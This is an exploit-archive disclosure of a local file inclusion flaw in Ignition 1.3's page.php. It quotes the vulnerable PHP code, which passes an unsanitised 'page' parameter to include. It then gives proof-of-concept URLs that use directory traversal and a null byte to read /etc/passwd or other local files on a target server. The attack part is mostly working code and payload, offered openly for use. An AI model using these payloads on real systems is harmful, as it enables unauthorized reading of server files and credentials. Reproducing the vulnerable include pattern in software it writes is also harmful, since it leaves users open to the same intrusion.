[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ignition 1.3 (page.php) Local File Inclusion Vulnerability
# Published : 2010-12-30
# Author : cOndemned
# Previous Title : S40 CMS v.0.4.1 Change Admin Passwd CSRF Exploit
# Next Title : PiXie CMS v1.04 <= Multiple CSRF Vulnerabilities
Ignition 1.3 (page) Local File Inclusion Vulnerability
disclosed by cOndemned
download:
http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
note:
1. Magic_quotes_gpc should be turned off in order to exploit this vulnerability
2. LFI bugs found by me in previous version (1.2) are still working in this one
source of page.php
1. <?php
2. session_start();
3. require "data/settings.php";
4. if (file_exists('data/pages/'.$_GET['page'].'.html')) {
5. include ('data/pages/'.$_GET['page'].'.html'); <----- LFI
6. }else{
7. die(
8. require('404.php')); }
proof of concept:
http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../etc/passwd%00
http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../[localfile]%00